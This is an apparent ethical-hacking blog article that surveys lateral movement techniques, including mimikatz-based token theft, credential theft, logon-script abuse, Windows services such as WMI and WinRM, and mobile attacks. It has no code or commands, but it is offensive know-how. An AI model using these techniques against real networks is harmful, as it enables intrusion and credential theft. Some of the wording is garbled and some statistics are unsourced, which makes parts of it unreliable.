Those with at least a basic understanding of Ethical hacking techniques realize how much hackers can rely on lateral movement techniques to carry out their exploits on the computer systems of others in Ethical hacking. But what exactly are lateral movement techniques, you may be asking?
This article details some of the most popular lateral movement techniques used by opponents. Ethical hackers should study these techniques to better test their own organization’s network against these attacks. For those who want a solid look at common lateral movement techniques, this article is for you in Ethical hacking .
A little about lateral movements[Ethical hacking]
To give a quick definition here, cybercriminals use lateral movements to systematically move around a network to look for sensitive data or assets to perform data exfiltration.
Did you know that it takes an average of seven months for a data breach to be discovered? And of those breaches, only 4% are actually investigated?
Or how about: 80% of the time the attack is going sideways? This is because attackers are blind in systems most of the time and must move slowly to minimize detection. Just imagine all the potential data leaks, in addition to other damage that hackers can cause during this time. For those concerned about security, this is enough to cause you to lose sleep.
Also read about Ethical hacking:UEFI Boot vs. the MBR/VBR Boot Process-byBlackhat Pakistan 2023
PowerShell is the number one mechanism for implementing lateral movement techniques. PowerShell uses object-oriented scripting, which makes stealing credentials, modifying system configuration, and automating the movement from system to system as easy as it is legal to own. (Funny how some of the most readily available tools used offensive techniques, including sideways movement.)
It’s technically a tool, not a technique, but it’s definitely worth mentioning based on its over-representation. Ethical hackers would be smart to use it themselves.
Common lateral movement techniques
Lateral movement techniques are certainly not lacking in number or variety, but the basic strategy is the same. Here’s how: gain access to a low-privilege, low-security asset, escalate permissions, and scan the network for targets of interest.
Below is a list, in no particular order, of some of the most commonly used black hat hacking techniques that ethical hackers can use to test their organization’s systems and networks. It goes by the old adage “know your enemy”.
Token theft, which is used in most attacks today, is certainly a cutting-edge technique. Using tools such as Windows Credential Editor and mimikatz, attackers find a service account in system memory, generate Kerberos tickets, and then use them to gain elevated privileges such as a domain administrator. This can be done without detection, often using PowerShell.
Stolen credentials are even more common than token theft. While organizations have responded to the attack landscape by investing in anti-malware capabilities, attackers have shifted their focus a bit, moving more towards core actions within the environment. Attackers know that once you steal legitimate credentials, not only is their job easier, but it’s much more difficult to detect. In fact, credential theft is part of almost every attack strategy under the sun.
The most reliable methods of credential theft include reusing credentials leaked on another site, phishing and social engineering, and brute force attacks. These methods of credential theft allow for smoother lateral movements within an organization’s network.
Windows uses logon scripts whenever users log on to a computer system. These scripts can run other programs, perform administrative functions, and send information to login servers on the network. If attackers have access to these scripts, they can inject their own pieces of code for the continued persistence of the compromised system.
Lateral movement comes into play if these login scripts are stored on a central server. When these login scripts are kicked into systems on the network, attackers can use them to move around.
Other techniques for moving sideways
Lateral movement techniques are varied, to say the least, and attackers are resourceful in exploiting the state of systems (especially Windows) that most organizations use. These techniques may differ, but they use many of the same corridors to move within the network. These include:
- Vulnerability Exploitation
- Removable media
- Exploitation of application deployment software
- Abuse of Windows features and services
Wait a minute, did I just say Windows features and services? I did. This is the scariest thing for an organization’s network because Windows features and services run 24/7 and are used daily. These features and services may include (non-exclusive list):
- Remote surface
- Server Message Block (SMB)
- Service Control Manager (SCM)
- Windows Management Instrumentation (WMI)
- Task scheduler
- Windows Remote Management (WinRM)
- DCOM (Distributed Component Object Model)
Mobile lateral movement
Mobile technology is not spared from the onslaught of lateral movement techniques. The two most common techniques are listed below.
Attack on PC via USB connection
Attackers are adept at using Android technology in their attacks, and lateral movement is part of that game plan. Simply put, attackers can escalate privileges within a mobile device and then program the mobile device to impersonate other USB devices in order to attack the computer to which it is physically connected. This technique has not yet been discovered on iOS.
Leverage corporate resources
Attackers can also exploit a mobile device’s access to an organization’s network resources through a local area connection or virtual private network (VPN). The best example of this is DressCode, which is a family of Android malware that creates a “universal tunnel” that adversaries can use to move within a network.
Lateral movement in network and system attacks is equivalent to physical movement in burglary. A thief needs to be able to move freely within a location to carry out their break-in, and attackers need the same kind of mobility to see what’s on the network and avoid detection.
Since the average lifetime of an attack is seven months before detection, lateral movement is necessary for these attacks to go undetected, as well as for network reconnaissance. Ethical hackers should learn to use these lateral movement techniques within their network to get a better idea of how real attackers would behave if they got inside.
- The Top 20 Lateral Movement Tactics, Smokescreen
- Hacking Happens: Stolen Credentials, Immunio
- Lateral Movement, MITRE
- Lateral Movement (Mobile), MITRE
- Logon Scripts, MITRE